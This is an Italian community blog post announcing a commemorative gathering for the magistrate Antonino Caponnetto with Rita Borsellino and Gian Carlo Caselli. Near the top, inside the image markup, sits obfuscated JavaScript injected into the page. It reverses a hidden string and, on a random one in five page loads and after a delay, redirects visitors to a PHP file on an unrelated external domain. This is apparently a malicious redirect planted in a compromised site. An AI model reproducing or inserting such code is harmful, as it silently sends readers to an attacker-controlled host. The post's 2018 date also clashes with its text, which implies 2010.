21 novembre 2018

Ricordando Antonino Caponnetto. Domenica incontro alle Piagge con Caselli e Borsellino

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/12/caponnetto.jpg”>

Riceviamo dalla Comunità delle Piagge e pubblichiamo

Il 6 dicembre di otto anni fa moriva il magistrato Antonino Caponnetto, che aveva un profondo legame di amicizia e di attenzione con la nostra Comunità delle Piagge.
La sua vicinanza era un segnale di stima nei confronti del nostro lavoro comunitario e sociale, un lavoro che noi abbiamo sempre considerato di antimafia sociale e culturale.
Ad un mese dalla sua morte, accanto al Muretto, luogo simbolo del nostro impegno, piantammo un mandorlo, pianta tipica della terra di Sicilia e anticipatrice della primavera… pianta adatta per una persona come Antonino Caponnetto.

Domenica prossima, 5 dicembre, nel pomeriggio, vorremmo invitare chi si sente amico del lavoro di questa Comunità a partecipare a questa giornata dedicata alla memoria di Antonino Caponnetto, che abbiamo pensato di chiamare “Voglia di giustizia”.
Saranno presenti con noi Rita Borsellino, Elisabetta Caponnetto,
Gian Carlo Caselli.

0 Comments

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *